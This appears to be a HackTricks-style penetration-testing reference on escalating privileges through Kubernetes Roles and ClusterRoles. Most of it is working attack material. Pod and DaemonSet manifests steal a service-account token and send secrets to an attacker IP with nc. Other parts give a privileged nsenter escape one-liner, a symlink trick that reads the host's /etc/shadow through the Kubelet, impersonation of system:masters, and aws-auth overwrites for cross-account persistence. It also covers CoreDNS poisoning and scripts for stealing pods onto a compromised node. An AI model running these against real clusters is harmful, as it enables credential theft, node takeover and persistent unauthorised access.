Abusing Roles/ClusterRoles in Kubernetes

Tip

Learn & practice AWS Hacking:

HackTricks Training AWS Red Team Expert (ARTE)

Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)

Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

- Check the subscription plans!

- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Here you can find some potentially dangerous Roles and ClusterRoles configurations.

Remember that you can get all the supported resources with kubectl api-resources

Privilege Escalation

Privilege escalation here means getting access to a different principal, with different privileges than the ones you already have, either within the Kubernetes cluster or in external clouds. In Kubernetes there are basically 4 main techniques to escalate privileges:

- Be able to impersonate other users/groups/SAs with better privileges within the Kubernetes cluster or in external clouds

- Be able to create/patch/exec pods where you can find or attach SAs with better privileges within the Kubernetes cluster or in external clouds

- Be able to read secrets, as SA tokens are stored as secrets

- Be able to escape to the node from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any)

- A fifth technique that deserves a mention is the ability to run port-forward in a pod, as you may be able to access interesting resources within that pod.

Access Any Resource or Verb (Wildcard)

The wildcard (*) gives permission over any resource with any verb. It's typically used by admins. Inside a ClusterRole this means that an attacker could abuse any namespace in the cluster:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: api-resource-verbs-all
rules:
  - apiGroups: ["*"]
    resources: ["*"]
    verbs: ["*"]
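To make the effect of the wildcard concrete, here is a minimal Python sketch of how a rule containing "*" matches a request. The function name rule_allows and the dict layout (mirroring the YAML keys) are assumptions made for illustration. The real RBAC authorizer also handles resourceNames, subresources and nonResourceURLs, which this sketch ignores.

```python
def _matches(allowed, value):
    """True if the rule list contains the value or the "*" wildcard."""
    return "*" in allowed or value in allowed


def rule_allows(rule, api_group, resource, verb):
    """Simplified check of one RBAC rule against one request."""
    return (
        _matches(rule.get("apiGroups", []), api_group)
        and _matches(rule.get("resources", []), resource)
        and _matches(rule.get("verbs", []), verb)
    )


wildcard_rule = {"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}
narrow_rule = {"apiGroups": [""], "resources": ["pods"], "verbs": ["get"]}

print(rule_allows(wildcard_rule, "", "secrets", "get"))  # True
print(rule_allows(narrow_rule, "", "secrets", "get"))    # False
```

With the wildcard rule every combination of group, resource and verb is accepted, which is why it is equivalent to full control over the scope of the binding.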

Access Any Resource with a specific verb

In RBAC, certain permissions pose significant risks:

- create: Grants the ability to create any cluster resource, risking privilege escalation.

- list: Allows listing all resources, potentially leaking sensitive data.

- get: Permits accessing secrets from service accounts, posing a security threat.

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: api-resource-verbs-all
rules:
  - apiGroups: ["*"]
    resources: ["*"]
    verbs: ["create", "list", "get"]

Pod Create - Steal Token

An attacker with permission to create a pod could attach a privileged Service Account to the pod and steal its token to impersonate the Service Account, effectively escalating privileges to it.

Example of a pod that will steal the token of the bootstrap-signer service account and send it to the attacker:

apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
    - name: alpine
      image: alpine
      command: ["/bin/sh"]
      args:
        [
          "-c",
          'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000',
        ]
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  hostNetwork: true

Pod Create & Escape

The following lists all the privileges a container can be given:

- Privileged access (disabling protections and setting capabilities)

- Sharing the host IPC and PID namespaces (hostIPC and hostPID), which can help to escalate privileges

- Sharing the host network namespace (hostNetwork), giving access to steal the node's cloud privileges and better access to networks

- Mounting the host's / inside the container

apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  # Uncomment and specify a specific node you want to debug
  # nodeName: <insert-node-name-here>
  containers:
    - image: ubuntu
      command:
        - "sleep"
        - "3600" # adjust this as needed -- use only as long as you need
      imagePullPolicy: IfNotPresent
      name: ubuntu
      securityContext:
        allowPrivilegeEscalation: true
        privileged: true
        #capabilities:
        #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
        runAsUser: 0 # run as root (or any other user)
      volumeMounts:
        - mountPath: /host
          name: host-volume
  restartPolicy: Never # we want to be intentional about running this pod
  hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html
  hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html
  hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.html
  volumes:
    - name: host-volume
      hostPath:
        path: /

Create the pod with:

kubectl --token $token create -f mount_root.yaml

One-liner from this tweet and with some additions:

kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'

Now that you can escape to the node check post-exploitation techniques in:

Stealth

You probably want to be stealthier. The following pages show what you would be able to access if you create a pod enabling only some of the privileges mentioned in the previous template:

- Privileged + hostPID

- Privileged only

- hostPath

- hostPID

- hostNetwork

- hostIPC

You can find examples of how to create/abuse the previous privileged pod configurations in https://github.com/BishopFox/badPods
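When reviewing manifests (yours or the ones you are about to submit), it can help to see at a glance which of the settings above a pod requests. The following is a rough Python sketch, assuming the manifest has already been loaded into a dict. The function name risky_pod_settings is hypothetical and only the fields discussed in this section are inspected.

```python
def risky_pod_settings(pod):
    """Return the host-level privileges requested by a pod manifest (dict)."""
    spec = pod.get("spec", {})
    found = [key for key in ("hostPID", "hostIPC", "hostNetwork") if spec.get(key)]
    # A single privileged container is enough to flag the pod.
    for container in spec.get("containers", []):
        if container.get("securityContext", {}).get("privileged"):
            found.append("privileged")
            break
    if any("hostPath" in volume for volume in spec.get("volumes", [])):
        found.append("hostPath")
    return found


pod = {
    "spec": {
        "hostPID": True,
        "containers": [
            {"name": "1", "image": "alpine", "securityContext": {"privileged": True}}
        ],
    }
}
print(risky_pod_settings(pod))  # ['hostPID', 'privileged']
```

The example dict mirrors the "Privileged + hostPID" combination from the list above.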

Pod Create - Move to cloud

If you can create a pod (and optionally a service account) you might be able to obtain privileges in the cloud environment by assigning cloud roles to a pod or a service account and then accessing it.

Moreover, if you can create a pod with the host network namespace you can steal the IAM role of the node instance.

For more information check:

Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs

It's possible to abuse these permissions to create a new pod and escalate privileges like in the previous example.

The following yaml creates a daemonset and exfiltrates the token of the SA inside the pod:

apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: alpine
  namespace: kube-system
spec:
  selector:
    matchLabels:
      name: alpine
  template:
    metadata:
      labels:
        name: alpine
    spec:
      serviceAccountName: bootstrap-signer
      automountServiceAccountToken: true
      hostNetwork: true
      containers:
        - name: alpine
          image: alpine
          command: ["/bin/sh"]
          args:
            [
              "-c",
              'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000',
            ]
          volumeMounts:
            - mountPath: /root
              name: mount-node-root
      volumes:
        - name: mount-node-root
          hostPath:
            path: /

Pods Exec

pods/exec is a resource in kubernetes used for running commands in a shell inside a pod. This allows to run commands inside the containers or get a shell inside.

Therefore, it's possible to get inside a pod and steal the token of the SA, or enter a privileged pod, escape to the node, and steal all the tokens of the pods in the node and (ab)use the node:

kubectl exec -it <POD_NAME> -n <NAMESPACE> -- sh

Note

By default the command is executed in the first container of the pod. Get all the containers in a pod with kubectl get pods <pod_name> -o jsonpath='{.spec.containers[*].name}' and then indicate the container where you want to execute it with kubectl exec -it <pod_name> -c <container_name> -- sh

If it's a distroless container you could try using shell builtins to get info about the containers, or uploading your own tools like a busybox using: kubectl cp </path/local/file> <podname>:</path/in/container>.

port-forward

This permission allows forwarding one local port to one port in the specified pod. This is meant to make it easy to debug applications running inside a pod, but an attacker might abuse it to get access to interesting applications (like DBs) or vulnerable ones (web apps?) inside a pod:

kubectl port-forward pod/mypod 5000:5000

Hosts Writable /var/log/ Escape

As indicated in this research, if you can access or create a pod with the host's /var/log/ directory mounted on it, you can escape from the container.

This is basically because when the Kube-API tries to get the logs of a container (using kubectl logs <pod>), it requests the 0.log file of the pod using the /logs/ endpoint of the Kubelet service.

The Kubelet service exposes the /logs/ endpoint, which basically exposes the /var/log filesystem of the container.

Therefore, an attacker with access to write in the /var/log/ folder of the container could abuse this behaviour in 2 ways:

- Modifying the 0.log file of its container (usually located in /var/log/pods/namespace_pod_uid/container/0.log) to be a symlink pointing to /etc/shadow, for example. Then, you will be able to exfiltrate the host's shadow file doing:

kubectl logs escaper

failed to get parse function: unsupported log format: "root::::::::\n"

kubectl logs escaper --tail=2

failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\n"

# Keep incrementing tail to exfiltrate the whole file

- If the attacker controls any principal with the permissions to read nodes/log, he can just create a symlink in /host-mounted/var/log/sym to / and when accessing https://<gateway>:10250/logs/sym/ he will list the host's root filesystem (changing the symlink can provide access to files).

curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/'

<a href="bin">bin</a>

<a href="data/">data/</a>

<a href="dev/">dev/</a>

<a href="etc/">etc/</a>

<a href="home/">home/</a>

<a href="init">init</a>

<a href="lib">lib</a>

[...]

A laboratory and automated exploit can be found in https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts
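The core of the first variant is just swapping a log file for a symlink so that whoever reads the log follows the link. A harmless Python sketch of that step is shown here. It only works inside a temporary directory with stand-in files, and the helper name replace_with_symlink is an assumption for illustration. In the real attack the link is followed by the Kubelet on the host, which is what turns it into a host file read.

```python
import os
import tempfile


def replace_with_symlink(log_file, target):
    """Replace a container log file with a symlink to another path."""
    os.remove(log_file)
    os.symlink(target, log_file)


# Harmless demo: everything lives in a temporary directory.
with tempfile.TemporaryDirectory() as tmp:
    secret = os.path.join(tmp, "shadow")   # stand-in for /etc/shadow
    log_file = os.path.join(tmp, "0.log")  # stand-in for the pod's 0.log
    with open(secret, "w") as f:
        f.write("root::::::::\n")
    with open(log_file, "w") as f:
        f.write("regular log line\n")

    replace_with_symlink(log_file, secret)

    # Reading the "log" now returns the content of the link target.
    with open(log_file) as f:
        leaked = f.read()

print(leaked)
```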

Bypassing readOnly protection

If you are lucky enough and the highly privileged capability CAP_SYS_ADMIN is available, you can just remount the folder as rw:

mount -o rw,remount /hostlogs/

Bypassing hostPath readOnly protection

As stated in this research it’s possible to bypass the protection:

allowedHostPaths:
  - pathPrefix: "/foo"
    readOnly: true

This protection was meant to prevent escapes like the previous ones. To bypass it, instead of using a hostPath mount, use a PersistentVolume and a PersistentVolumeClaim to mount a host folder in the container with writable access:

apiVersion: v1
kind: PersistentVolume
metadata:
  name: task-pv-volume-vol
  labels:
    type: local
spec:
  storageClassName: manual
  capacity:
    storage: 10Gi
  accessModes:
    - ReadWriteOnce
  hostPath:
    path: "/var/log"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: task-pv-claim-vol
spec:
  storageClassName: manual
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 3Gi
---
apiVersion: v1
kind: Pod
metadata:
  name: task-pv-pod
spec:
  volumes:
    - name: task-pv-storage-vol
      persistentVolumeClaim:
        claimName: task-pv-claim-vol
  containers:
    - name: task-pv-container
      image: ubuntu:latest
      command: ["sh", "-c", "sleep 1h"]
      volumeMounts:
        - mountPath: "/hostlogs"
          name: task-pv-storage-vol

Impersonating privileged accounts

With a user impersonation privilege, an attacker could impersonate a privileged account.

Just use the parameter --as=<username> in the kubectl command to impersonate a user, or --as-group=<group> to impersonate a group:

kubectl get pods --as=system:serviceaccount:kube-system:default

kubectl get secrets --as=null --as-group=system:masters

Or use the REST API:

curl -k -v -XGET -H "Authorization: Bearer <JWT TOKEN (of the impersonator)>" \
  -H "Impersonate-Group: system:masters" \
  -H "Impersonate-User: null" \
  -H "Accept: application/json" \
  https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
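If you script these requests instead of using curl, the only thing that changes with impersonation is the set of headers. Below is a small Python sketch that builds them. The function name impersonation_headers is an assumption, and nothing is sent over the network, so plug the result into whatever HTTP client you use.

```python
def impersonation_headers(token, user, groups=()):
    """Build the HTTP headers for an impersonated Kubernetes API request."""
    headers = [
        ("Authorization", f"Bearer {token}"),  # token of the impersonator
        ("Impersonate-User", user),
        ("Accept", "application/json"),
    ]
    # One Impersonate-Group header per group to impersonate.
    headers.extend(("Impersonate-Group", group) for group in groups)
    return headers


for name, value in impersonation_headers("<JWT TOKEN>", "null", ["system:masters"]):
    print(f"{name}: {value}")
```

A list of pairs is used rather than a dict because the group header may need to appear more than once.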

Listing Secrets

The permission to list secrets could allow an attacker to actually read the secrets accessing the REST API endpoint:

curl -v -H "Authorization: Bearer <jwt_token>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/

Creating and Reading Secrets

There is a special kind of a Kubernetes secret of type kubernetes.io/service-account-token which stores serviceaccount tokens. If you have permissions to create and read secrets, and you also know the serviceaccount’s name, you can create a secret as follows and then steal the victim serviceaccount’s token from it:

apiVersion: v1
kind: Secret
metadata:
  name: stolen-admin-sa-token
  namespace: default
  annotations:
    kubernetes.io/service-account.name: cluster-admin-sa
type: kubernetes.io/service-account-token

Example exploitation:

$ SECRETS_MANAGER_TOKEN=$(kubectl create token secrets-manager-sa)

$ kubectl auth can-i --list --token=$SECRETS_MANAGER_TOKEN

Warning: the list may be incomplete: webhook authorizer does not support user rule resolution

Resources Non-Resource URLs Resource Names Verbs

selfsubjectreviews.authentication.k8s.io [] [] [create]

selfsubjectaccessreviews.authorization.k8s.io [] [] [create]

selfsubjectrulesreviews.authorization.k8s.io [] [] [create]

secrets [] [] [get create]

[/.well-known/openid-configuration/] [] [get]

<SNIP>

[/version] [] [get]

$ kubectl create token cluster-admin-sa --token=$SECRETS_MANAGER_TOKEN

error: failed to create token: serviceaccounts "cluster-admin-sa" is forbidden: User "system:serviceaccount:default:secrets-manager-sa" cannot create resource "serviceaccounts/token" in API group "" in the namespace "default"

$ kubectl get pods --token=$SECRETS_MANAGER_TOKEN --as=system:serviceaccount:default:secrets-manager-sa

Error from server (Forbidden): serviceaccounts "secrets-manager-sa" is forbidden: User "system:serviceaccount:default:secrets-manager-sa" cannot impersonate resource "serviceaccounts" in API group "" in the namespace "default"

$ kubectl apply -f ./secret-that-steals-another-sa-token.yaml --token=$SECRETS_MANAGER_TOKEN

secret/stolen-admin-sa-token created

$ kubectl get secret stolen-admin-sa-token --token=$SECRETS_MANAGER_TOKEN -o json

{

"apiVersion": "v1",

"data": {

"ca.crt": "LS0tLS1CRUdJTiBDRVJUSUZJQ0FU<SNIP>UlRJRklDQVRFLS0tLS0K",

"namespace": "ZGVmYXVsdA==",

"token": "ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWk<SNIP>jYkowNWlCYjViMEJUSE1NcUNIY0h4QTg2aXc="

},

"kind": "Secret",

"metadata": {

"annotations": {

"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{\"kubernetes.io/service-account.name\":\"cluster-admin-sa\"},\"name\":\"stolen-admin-sa-token\",\"namespace\":\"default\"},\"type\":\"kubernetes.io/service-account-token\"}\n",

"kubernetes.io/service-account.name": "cluster-admin-sa",

"kubernetes.io/service-account.uid": "faf97f14-1102-4cb9-9ee0-857a6695973f"

},

"creationTimestamp": "2025-01-11T13:02:27Z",

"name": "stolen-admin-sa-token",

"namespace": "default",

"resourceVersion": "1019116",

"uid": "680d119f-89d0-4fc6-8eef-1396600d7556"

},

"type": "kubernetes.io/service-account-token"

}

Note that if you are allowed to create and read secrets in a certain namespace, the victim serviceaccount also must be in that same namespace.
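The two steps above (create the secret, then read the token back) can be sketched in Python as follows. The helper names sa_token_secret and decode_field are assumptions for illustration. The manifest is emitted as JSON, which kubectl apply accepts as well as YAML, and the values under data are base64-encoded, so they need decoding before use.

```python
import base64
import json


def sa_token_secret(name, namespace, service_account):
    """Build a Secret manifest that requests a token for the given SA."""
    return {
        "apiVersion": "v1",
        "kind": "Secret",
        "metadata": {
            "name": name,
            "namespace": namespace,
            "annotations": {"kubernetes.io/service-account.name": service_account},
        },
        "type": "kubernetes.io/service-account-token",
    }


def decode_field(secret, field):
    """Decode one base64-encoded entry of a Secret's data map."""
    return base64.b64decode(secret["data"][field]).decode()


manifest = sa_token_secret("stolen-admin-sa-token", "default", "cluster-admin-sa")
print(json.dumps(manifest, indent=2))

# The namespace value is taken from the kubectl output shown above.
print(decode_field({"data": {"namespace": "ZGVmYXVsdA=="}}, "namespace"))  # default
```

The same decode_field call on the token entry yields the JWT that can be used as a bearer token.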

Reading a secret – brute-forcing token IDs

While an attacker in possession of a token with read permissions requires the exact name of the secret to use it, unlike the broader listing secrets privilege, there are still vulnerabilities. Default service accounts in the system can be enumerated, each associated with a secret. These secrets have a name structure: a static prefix followed by a random five-character alphanumeric token (excluding certain characters) according to the source code.

The token is generated from a limited 27-character set (bcdfghjklmnpqrstvwxz2456789), rather than the full alphanumeric range. This limitation reduces the total possible combinations to 14,348,907 (27^5). Consequently, an attacker could feasibly execute a brute-force attack to deduce the token in a matter of hours, potentially leading to privilege escalation by accessing sensitive service accounts.
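The arithmetic can be checked with a few lines of Python, which also show how candidate names would be enumerated. The prefix "default-token-" in the example is an assumption chosen for illustration. The character set and the suffix length are the ones quoted in the text.

```python
import itertools

ALPHABET = "bcdfghjklmnpqrstvwxz2456789"  # character set quoted in the text
SUFFIX_LENGTH = 5


def keyspace_size():
    """Number of possible random suffixes."""
    return len(ALPHABET) ** SUFFIX_LENGTH


def candidate_names(prefix):
    """Lazily yield every possible secret name for a static prefix."""
    for chars in itertools.product(ALPHABET, repeat=SUFFIX_LENGTH):
        yield prefix + "".join(chars)


print(len(ALPHABET))     # 27
print(keyspace_size())   # 14348907
print(next(candidate_names("default-token-")))  # default-token-bbbbb
```

Because candidate_names is a generator, the roughly 14 million names are never held in memory at once.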

EncryptionConfiguration in clear text

It’s possible to find clear text keys to encrypt data at rest in this type of object like:

# From https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/
#
# CAUTION: this is an example configuration.
# Do not use this for your own cluster!
#
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
      - secrets
      - configmaps
      - pandas.awesome.bears.example # a custom resource API
    providers:
      # This configuration does not provide data confidentiality. The first
      # configured provider is specifying the "identity" mechanism, which
      # stores resources as plain text.
      #
      - identity: {} # plain text, in other words NO encryption
      - aesgcm:
          keys:
            - name: key1
              secret: c2VjcmV0IGlzIHNlY3VyZQ==
            - name: key2
              secret: dGhpcyBpcyBwYXNzd29yZA==
      - aescbc:
          keys:
            - name: key1
              secret: c2VjcmV0IGlzIHNlY3VyZQ==
            - name: key2
              secret: dGhpcyBpcyBwYXNzd29yZA==
      - secretbox:
          keys:
            - name: key1
              secret: YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoxMjM0NTY=
  - resources:
      - events
    providers:
      - identity: {} # do not encrypt Events even though *.* is specified below
  - resources:
      - '*.apps' # wildcard match requires Kubernetes 1.27 or later
    providers:
      - aescbc:
          keys:
            - name: key2
              secret: c2VjcmV0IGlzIHNlY3VyZSwgb3IgaXMgaXQ/Cg==
  - resources:
      - '*.*' # wildcard match requires Kubernetes 1.27 or later
    providers:
      - aescbc:
          keys:
            - name: key3
              secret: c2VjcmV0IGlzIHNlY3VyZSwgSSB0aGluaw==

Certificate Signing Requests

If you have the verb create on the resource certificatesigningrequests (or at least on certificatesigningrequests/nodeClient), you can create a new CSR for a new node.

According to the documentation it's possible to auto-approve these requests, so in that case you don't need extra permissions. If not, you would need to be able to approve the request, which means update on certificatesigningrequests/approval and approve on signers with resourceName <signerNameDomain>/<signerNamePath> or <signerNameDomain>/*

An example of a role with all the required permissions is:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: csr-approver
rules:
  - apiGroups:
      - certificates.k8s.io
    resources:
      - certificatesigningrequests
    verbs:
      - get
      - list
      - watch
      - create
  - apiGroups:
      - certificates.k8s.io
    resources:
      - certificatesigningrequests/approval
    verbs:
      - update
  - apiGroups:
      - certificates.k8s.io
    resources:
      - signers
    resourceNames:
      - example.com/my-signer-name # example.com/* can be used to authorize for all signers in the 'example.com' domain
    verbs:
      - approve

So, with the new node CSR approved, you can abuse the special permissions of nodes to steal secrets and escalate privileges.

In this post and this one the GKE K8s TLS Bootstrap configuration is configured with automatic signing and it’s abused to generate credentials of a new K8s Node and then abuse those to escalate privileges by stealing secrets.

If you have the mentioned privileges you could do the same thing. Note that the first example bypasses the error preventing a new node from accessing secrets inside containers, because a node can only access the secrets of containers mounted on it.

The way to bypass this is just to create node credentials for the node name where the container with the interesting secrets is mounted (but just check how to do it in the first post):

"/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73b1-8cj1"

AWS EKS aws-auth configmaps

Principals that can modify configmaps in the kube-system namespace on EKS clusters (the cluster needs to be in AWS) can obtain cluster admin privileges by overwriting the aws-auth configmap.

The verbs needed are update and patch, or create if configmap wasn’t created:

# Check if config map exists
kubectl get configmap aws-auth -n kube-system -o yaml

## Yaml example
apiVersion: v1
kind: ConfigMap
metadata:
  name: aws-auth
  namespace: kube-system
data:
  mapRoles: |
    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
      username: system:node:{{EC2PrivateDNSName}}
      groups:
        - system:masters

# Create the config map if it doesn't exist
## Using kubectl and the previous yaml
kubectl apply -f /tmp/aws-auth.yaml
## Using eksctl
eksctl create iamidentitymapping --cluster Testing --region us-east-1 --arn arn:aws:iam::123456789098:role/SomeRoleTestName --group "system:masters" --no-duplicate-arns

# Modify it
kubectl edit -n kube-system configmap/aws-auth
## You can modify it to even give access to users from other accounts
data:
  mapRoles: |
    - rolearn: arn:aws:iam::123456789098:role/SomeRoleTestName
      username: system:node:{{EC2PrivateDNSName}}
      groups:
        - system:masters
  mapUsers: |
    - userarn: arn:aws:iam::098765432123:user/SomeUserTestName
      username: admin
      groups:
        - system:masters

Warning

You can use aws-auth for persistence, giving access to users from other accounts.

However, aws --profile other_account eks update-kubeconfig --name <cluster-name> doesn't work from a different account. But actually aws --profile other_account eks get-token --cluster-name arn:aws:eks:us-east-1:123456789098:cluster/Testing works if you put the ARN of the cluster instead of just the name.

To make kubectl work, just make sure to configure the victim's kubeconfig and in the aws exec args add --profile other_account_role so kubectl will be using the other account's profile to get the token and contact AWS.

CoreDNS config map

If you have the permissions to modify the coredns configmap in the kube-system namespace, you can modify the addresses that domains will be resolved to, in order to perform MitM attacks to steal sensitive information or inject malicious content.

The verbs needed are update and patch over the coredns configmap (or all the config maps).

A regular coredns file contains something like this:

data:
  Corefile: |
    .:53 {
        log
        errors
        health {
           lameduck 5s
        }
        ready
        kubernetes cluster.local in-addr.arpa ip6.arpa {
           pods insecure
           fallthrough in-addr.arpa ip6.arpa
           ttl 30
        }
        prometheus :9153
        hosts {
           192.168.49.1 host.minikube.internal
           fallthrough
        }
        forward . /etc/resolv.conf {
           max_concurrent 1000
        }
        cache 30
        loop
        reload
        loadbalance
    }

An attacker could download it running kubectl get configmap coredns -n kube-system -o yaml, modify it adding something like rewrite name victim.com attacker.com so whenever victim.com is accessed actually attacker.com is the domain that is going to be accessed. And then apply it running kubectl apply -f poison_dns.yaml.

Another option is to just edit the file running kubectl edit configmap coredns -n kube-system and making changes.
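The edit itself is a one-line insertion into the Corefile. As a rough illustration, the following Python sketch adds the rewrite rule as the first directive of the .:53 server block. The function name add_rewrite and the shortened Corefile are assumptions, and a real Corefile may contain several server blocks that this sketch does not handle.

```python
def add_rewrite(corefile, victim, attacker):
    """Insert a 'rewrite name' rule as the first directive of the .:53 block."""
    lines = corefile.splitlines()
    for index, line in enumerate(lines):
        if line.strip().startswith(".:53") and line.rstrip().endswith("{"):
            lines.insert(index + 1, f"    rewrite name {victim} {attacker}")
            return "\n".join(lines) + "\n"
    raise ValueError("no .:53 server block found")


# Shortened stand-in for the Corefile shown above.
corefile = ".:53 {\n    errors\n    forward . /etc/resolv.conf\n}\n"
poisoned = add_rewrite(corefile, "victim.com", "attacker.com")
print(poisoned)
```

The resulting text goes back into the Corefile key of the configmap before applying it.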

Escalating in GKE

There are 2 ways to assign K8s permissions to GCP principals. In any case the principal also needs the permission container.clusters.get to be able to gather credentials to access the cluster, or you will need to generate your own kubectl config file (follow the next link).

Warning

When talking to the K8s api endpoint, the GCP auth token will be sent. Then, GCP, through the K8s api endpoint, will first check if the principal (by email) has any access inside the cluster, then it will check if it has any access via GCP IAM.

If any of those is true, the request will be answered. If not, an error suggesting to give permissions via GCP IAM will be returned.

The first method is using GCP IAM: the K8s permissions have their equivalent GCP IAM permissions, and if the principal has them, it will be able to use them.

The second method is assigning K8s permissions inside the cluster, identifying the user by its email (GCP service accounts included).

Create serviceaccounts token

Principals that can create TokenRequests (serviceaccounts/token) can issue tokens for existing SAs (info from here).

ephemeralcontainers

Principals that can update or patch pods/ephemeralcontainers can gain code execution on other pods, and potentially break out to their node by adding an ephemeral container with a privileged securityContext

ValidatingWebhookConfigurations or MutatingWebhookConfigurations

Principals with any of the verbs create, update or patch over validatingwebhookconfigurations or mutatingwebhookconfigurations might be able to create one of such webhookconfigurations in order to be able to escalate privileges.

For a mutatingwebhookconfigurations example check this section of this post.

Escalate

As you can read in the next section, Built-in Privileged Escalation Prevention, a principal can neither update nor create roles or clusterroles without holding those new permissions itself, unless it has the verb escalate or * over roles or clusterroles and the respective binding options.

In that case it can update/create new roles and clusterroles with better permissions than the ones it has.

Nodes proxy

Principals with access to the nodes/proxy subresource can execute code on pods via the Kubelet API (according to this). More information about Kubelet authentication in this page:

Kubelet Authentication & Authorization

You have an example of how to get RCE talking authorized to a Kubelet API here.

Delete pods + unschedulable nodes

Principals that can delete pods (delete verb over pods resource), or evict pods (create verb over pods/eviction resource), or change pod status (access to pods/status), and that can also make other nodes unschedulable (access to nodes/status) or delete nodes (delete verb over nodes resource), and that have control over a pod, could steal pods from other nodes so they are executed in the compromised node, where the attacker can steal the tokens from those pods.

patch_node_capacity(){
    curl -s -X PATCH 127.0.0.1:8001/api/v1/nodes/$1/status -H "Content-Type: application/json-patch+json" -d '[{"op": "replace", "path":"/status/allocatable/pods", "value": "0"}]'
}

while true; do patch_node_capacity <id_other_node>; done &
# Launch the previous line for every node you need to attack
kubectl delete pods -n kube-system <privileged_pod_name>

Services status (CVE-2020-8554)

Principals that can modify services/status may set the status.loadBalancer.ingress.ip field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. Most mitigations for CVE-2020-8554 only prevent ExternalIP services (according to this).

Nodes and Pods status

Principals with update or patch permissions over nodes/status or pods/status, could modify labels to affect scheduling constraints enforced.

Built-in Privileged Escalation Prevention

Kubernetes has a built-in mechanism to prevent privilege escalation.

This system ensures that users cannot elevate their privileges by modifying roles or role bindings. The enforcement of this rule occurs at the API level, providing a safeguard even when the RBAC authorizer is inactive.

The rule stipulates that a user can only create or update a role if they possess all the permissions the role comprises. Moreover, the scope of the user’s existing permissions must align with that of the role they are attempting to create or modify: either cluster-wide for ClusterRoles or confined to the same namespace (or cluster-wide) for Roles.

Warning

There is an exception to the previous rule. If a principal has the verb escalate over roles or clusterroles, it can increase the privileges of roles and clusterroles even without having the permissions itself.
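The rule and its exception can be summarised in a few lines of Python. This is a deliberately simplified model, not the API server's actual algorithm: the names rule_covered and may_write_role are hypothetical, each new rule must be covered by a single held rule, and resourceNames and scopes are ignored.

```python
def _covers(held, wanted):
    """True if every entry in `wanted` is granted by the `held` list."""
    return "*" in held or all(item in held for item in wanted)


def rule_covered(held_rules, new_rule):
    """Simplified: some single held rule must cover the whole new rule."""
    return any(
        _covers(held.get("apiGroups", []), new_rule.get("apiGroups", []))
        and _covers(held.get("resources", []), new_rule.get("resources", []))
        and _covers(held.get("verbs", []), new_rule.get("verbs", []))
        for held in held_rules
    )


def may_write_role(held_rules, role_rules, has_escalate=False):
    """Allow the write if all rules are already held, or escalate is granted."""
    return has_escalate or all(rule_covered(held_rules, r) for r in role_rules)


held = [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]
wanted = [{"apiGroups": [""], "resources": ["secrets"], "verbs": ["get"]}]

print(may_write_role(held, wanted))                     # False
print(may_write_role(held, wanted, has_escalate=True))  # True
```

The first call fails because the principal holds nothing over secrets. The second succeeds only because of the escalate verb.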

Get & Patch RoleBindings/ClusterRoleBindings

Caution

Apparently this technique worked before, but according to my tests it's not working anymore for the same reason explained in the previous section. You cannot create/modify a rolebinding to give yourself or a different SA some privileges if you don't already have them.

The privilege to create Rolebindings allows a user to bind roles to a service account. This privilege can potentially lead to privilege escalation because it allows the user to bind admin privileges to a compromised service account.

Other Attacks

Sidecar proxy app

By default there isn't any encryption in the communication between pods. Mutual authentication: two-way, pod to pod.

Create a sidecar proxy app

A sidecar container consists of just adding a second (or more) container inside a pod.

